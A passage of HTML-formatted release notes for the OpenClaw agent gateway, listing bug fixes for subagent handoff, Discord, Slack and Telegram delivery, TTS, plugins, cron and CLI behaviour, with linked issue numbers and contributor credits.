<p>Subagents: honor <code>sessions_spawn</code> with <code>expectsCompletionMessage: false</code> by skipping parent completion handoff delivery while still running child cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75848/hovercard" href="https://github.com/openclaw/openclaw/issues/75848">#75848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media/completions: treat media-only message-tool sends as delivered async completion output, avoiding duplicate raw <code>MEDIA:</code> fallback posts after video or music generation finishes.</p>
</li>
<li>
<p>Gateway/logging: keep deferred channel startup logs on the subsystem logger, so Slack, Discord, Telegram, and voice-call startup messages keep timestamped prefixes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Codex/app-server: recover JSON-RPC frames split by raw command-output newlines and include a redacted preview when malformed app-server messages still reach the console. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Replies/typing: keep typing alive for queued follow-up messages that are genuinely waiting behind an active run, instead of making chat surfaces look idle while work is queued. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251046189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65685/hovercard" href="https://github.com/openclaw/openclaw/issues/65685">#65685</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/papag00se/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/papag00se">@papag00se</a>.</p>
</li>
<li>
<p>ACP/Discord: suppress completion announce delivery for inline thread-bound ACP session runs, so Discord thread-bound ACP replies are not delivered twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204352483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60780/hovercard" href="https://github.com/openclaw/openclaw/issues/60780">#60780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</p>
</li>
<li>
<p>Discord/threads: ignore webhook-authored copies in already-bound Discord session threads even when the webhook id differs, preventing PluralKit proxy copies from creating duplicate turn pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114424047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52005/hovercard" href="https://github.com/openclaw/openclaw/issues/52005">#52005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord/threads: return the created thread as partial success when the follow-up initial message fails, so agents do not retry thread creation and create empty duplicate threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084295408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48450/hovercard" href="https://github.com/openclaw/openclaw/issues/48450">#48450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dahifi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dahifi">@dahifi</a>.</p>
</li>
<li>
<p>Discord/components: consume every button or select in a non-reusable component message after the first authorized click, so single-use panels cannot fire sibling callbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132338088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54227" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54227/hovercard" href="https://github.com/openclaw/openclaw/issues/54227">#54227</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fujiwarakasei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fujiwarakasei">@fujiwarakasei</a>.</p>
</li>
<li>
<p>macOS/config: preserve existing <code>gateway.auth</code> and unrelated config keys during app fallback writes, so dashboard or Talk settings changes cannot strand Control UI clients by dropping persisted auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364348126" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75631/hovercard" href="https://github.com/openclaw/openclaw/issues/75631">#75631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fuma2013/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fuma2013">@Fuma2013</a>.</p>
</li>
<li>
<p>Control UI/TUI: keep reconnecting chat sends bound to the same backing session id and let TUI relaunches resume the last selected session, avoiding silent fresh sessions after refresh, reconnect, or terminal restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225359321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63195/hovercard" href="https://github.com/openclaw/openclaw/issues/63195">#63195</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283461066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68162/hovercard" href="https://github.com/openclaw/openclaw/issues/68162">#68162</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342917722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73546/hovercard" href="https://github.com/openclaw/openclaw/issues/73546">#73546</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bond260312-cmyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bond260312-cmyk">@bond260312-cmyk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhong18804784882/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhong18804784882">@zhong18804784882</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mtuwei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mtuwei">@mtuwei</a>.</p>
</li>
<li>
<p>Plugins/tools: let plugin manifests declare static tool availability so reply startup skips unavailable plugin tool runtimes instead of importing factories that only return <code>null</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord/reactions: skip reaction listener registration when DMs and group DMs are disabled and every configured guild has <code>reactionNotifications: "off"</code>, avoiding needless reaction-event queue work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078796783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47516" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47516/hovercard" href="https://github.com/openclaw/openclaw/issues/47516">#47516</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/x4v13r1120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/x4v13r1120">@x4v13r1120</a>.</p>
</li>
<li>
<p>CLI sessions: preserve explicit manual-attach reuse bindings so trusted CLI sessions are not invalidated on the first turn when auth, prompt, or MCP fingerprints drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75849/hovercard" href="https://github.com/openclaw/openclaw/issues/75849">#75849</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Telegram/streaming: keep partial preview streaming enabled for plain reply-to replies, disabling drafts only for real native quote excerpts that require Telegram quote parameters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577179" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73505" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73505/hovercard" href="https://github.com/openclaw/openclaw/issues/73505">#73505</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/choury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/choury">@choury</a>.</p>
</li>
<li>
<p>Config: log the "newer OpenClaw" version warning once per process instead of once per config snapshot read. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367749952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75927" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75927/hovercard" href="https://github.com/openclaw/openclaw/pull/75927">#75927</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</p>
</li>
<li>
<p>Telegram/message actions: treat benign delete-message 400s as no-op warnings instead of runtime errors, so stale or already-removed messages do not create noisy delete failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345339727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73726" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73726/hovercard" href="https://github.com/openclaw/openclaw/issues/73726">#73726</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Avicennasis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Avicennasis">@Avicennasis</a>.</p>
</li>
<li>
<p>Telegram: split long default markdown sends and media follow-up text into safe HTML chunks, so outbound messages over Telegram's limit no longer fail as one oversized Bot API request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367257816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75868/hovercard" href="https://github.com/openclaw/openclaw/issues/75868">#75868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</p>
</li>
<li>
<p>Gateway/chat history: merge Claude CLI transcript imports for Anthropic-routed sessions that still have a Claude CLI binding, so local chat history does not hide CLI JSONL turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367073060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75850/hovercard" href="https://github.com/openclaw/openclaw/issues/75850">#75850</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media: trim serialized JSON suffixes after local <code>MEDIA:</code> directive file extensions, so generated-image metadata cannot pollute the parsed media path and cause false <code>ENOENT</code> delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360047482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75182/hovercard" href="https://github.com/openclaw/openclaw/issues/75182">#75182</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TnzGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TnzGit">@TnzGit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/runtime: hot-reload Gateway plugin runtime surfaces after plugin enable/disable changes while keeping source-changing plugin install, update, and uninstall operations restart-backed so loaded module code is not reused. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330564867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72097" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72097/hovercard" href="https://github.com/openclaw/openclaw/issues/72097">#72097</a>.</p>
</li>
<li>
<p>Cron: make scheduler reload schedule comparison tolerate malformed persisted jobs, so one bad cron entry no longer aborts the whole tick. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367497925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75886" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75886/hovercard" href="https://github.com/openclaw/openclaw/issues/75886">#75886</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samfox-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samfox-ai">@samfox-ai</a>.</p>
</li>
<li>
<p>Doctor/channels: warn after migrations when default Telegram or Discord accounts have no configured token and their env fallback (<code>TELEGRAM_BOT_TOKEN</code> or <code>DISCORD_BOT_TOKEN</code>) is unavailable, with secret-safe migration docs for checking state-dir <code>.env</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74298/hovercard" href="https://github.com/openclaw/openclaw/issues/74298">#74298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: keep idle liveness samples in telemetry instead of visible warning logs unless diagnostic work is active, waiting, or queued. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/cron: reject provider-prefixed targets for the wrong channel and let prefixed announce targets such as <code>telegram:123</code> select their channel when delivery falls back to <code>last</code>, so Telegram IDs cannot be coerced into WhatsApp phone numbers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162988650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56839/hovercard" href="https://github.com/openclaw/openclaw/issues/56839">#56839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bencoremans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bencoremans">@bencoremans</a>.</p>
</li>
<li>
<p>Control UI/chat: keep live replies visible when a raw session alias such as <code>main</code> sends the chat turn but Gateway emits events under the canonical session key for the same run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345216396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73716/hovercard" href="https://github.com/openclaw/openclaw/issues/73716">#73716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teebes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teebes">@teebes</a>.</p>
</li>
<li>
<p>CLI/models: reject <code>--agent</code> on <code>openclaw models set</code> and <code>set-image</code> instead of silently writing agent-scoped requests to global model defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286636018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68391/hovercard" href="https://github.com/openclaw/openclaw/issues/68391">#68391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derrickabellard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derrickabellard">@derrickabellard</a>.</p>
</li>
<li>
<p>CLI: stop treating the legacy singular <code>openclaw tool ...</code> token as a plugin id under restrictive <code>plugins.allow</code>, so it falls through as a normal unknown/reserved command instead of suggesting a stale allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243981916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64732/hovercard" href="https://github.com/openclaw/openclaw/issues/64732">#64732</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashtag1974/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashtag1974">@hashtag1974</a>.</p>
</li>
<li>
<p>Media: write inbound media buffers through same-directory temp files before rename, so failed disk writes do not leave zero-byte artifacts for later voice transcription. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154946745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55966" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55966/hovercard" href="https://github.com/openclaw/openclaw/issues/55966">#55966</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>TTS/Telegram: keep trusted local audio generated by the TTS tool queued for voice-note delivery even when the run-level built-in tool list omits the raw <code>tts</code> name. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354905008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74752/hovercard" href="https://github.com/openclaw/openclaw/issues/74752">#74752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loveworld3033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loveworld3033">@Loveworld3033</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</p>
</li>
<li>
<p>TTS: require explicit user or config audio intent for the agent speech tool so dashboard chats stay text unless audio is requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303803702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69777/hovercard" href="https://github.com/openclaw/openclaw/issues/69777">#69777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>Plugins/config: keep bundled source-checkout plugins from being runtime-gated by install-only <code>minHostVersion</code> metadata, accept prerelease host floors, trim plugin-service startup failures to one log line, and avoid broad channel-runtime loading during base config parsing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Providers/configure: preserve the existing default model when adding or reauthing a provider whose plugin returns a default-model config patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099627324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50268/hovercard" href="https://github.com/openclaw/openclaw/issues/50268">#50268</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rixcorp-oc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rixcorp-oc">@rixcorp-oc</a>.</p>
</li>
<li>
<p>Slack/message actions: send media before the follow-up Block Kit message when Slack <code>send</code> includes a file plus presentation or interactive controls, so file attachments are no longer rejected. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111591995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51458/hovercard" href="https://github.com/openclaw/openclaw/issues/51458">#51458</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HirokiKobayashi-R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HirokiKobayashi-R">@HirokiKobayashi-R</a>.</p>
</li>
<li>
<p>Slack/DMs: honor <code>dmHistoryLimit</code> for fresh 1:1 Slack DM sessions by backfilling recent conversation history before the current reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240708914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64427/hovercard" href="https://github.com/openclaw/openclaw/issues/64427">#64427</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brantley-creator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brantley-creator">@brantley-creator</a>.</p>
</li>
<li>
<p>Slack/DMs: keep top-level direct messages on the stable DM session even when <code>replyToMode</code> targets Slack thread replies, preserving context across DM turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184870759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58832/hovercard" href="https://github.com/openclaw/openclaw/issues/58832">#58832</a>. Thanks @daye-jjeong.</p>
</li>
<li>
<p>Slack/delivery: preserve Slack Web API missing-scope details in outbound delivery errors, so queued retry state identifies the OAuth scope to add. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216375787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62391/hovercard" href="https://github.com/openclaw/openclaw/issues/62391">#62391</a>. Thanks @alexey-pelykh.</p>
</li>
<li>
<p>Slack/capabilities: read granted scopes from <code>auth.test</code> response metadata before trying legacy scope APIs, so modern bot tokens no longer report <code>unknown_method</code> for channel capabilities. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068646797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44625/hovercard" href="https://github.com/openclaw/openclaw/issues/44625">#44625</a>. Thanks @Qquanwei and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Slack/DMs: send text/block-only proactive DMs directly with <code>chat.postMessage(channel=&lt;user id&gt;)</code> while keeping conversation resolution for uploads and threaded sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213098355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62042" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62042/hovercard" href="https://github.com/openclaw/openclaw/issues/62042">#62042</a>. Thanks @MarkMolina.</p>
</li>
<li>
<p>Slack/routing: match route bindings written with Slack target syntax such as <code>channel:C...</code>, <code>user:U...</code>, or <code>&lt;@U...&gt;</code>, so bound Slack peers route to the configured agent instead of <code>main</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048907648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41608/hovercard" href="https://github.com/openclaw/openclaw/issues/41608">#41608</a>. Thanks @Winnsolutionsadmin.</p>
</li>
<li>
<p>Slack/routing: match public-channel allowlist entries written as <code>channel:C...</code> against bare Slack runtime channel IDs, so allowed channel mentions do not fail as <code>channel-not-allowed</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046643845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41264/hovercard" href="https://github.com/openclaw/openclaw/issues/41264">#41264</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160915756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56530/hovercard" href="https://github.com/openclaw/openclaw/pull/56530">#56530</a>. Thanks @babutree and @Realworld404.</p>
</li>
<li>
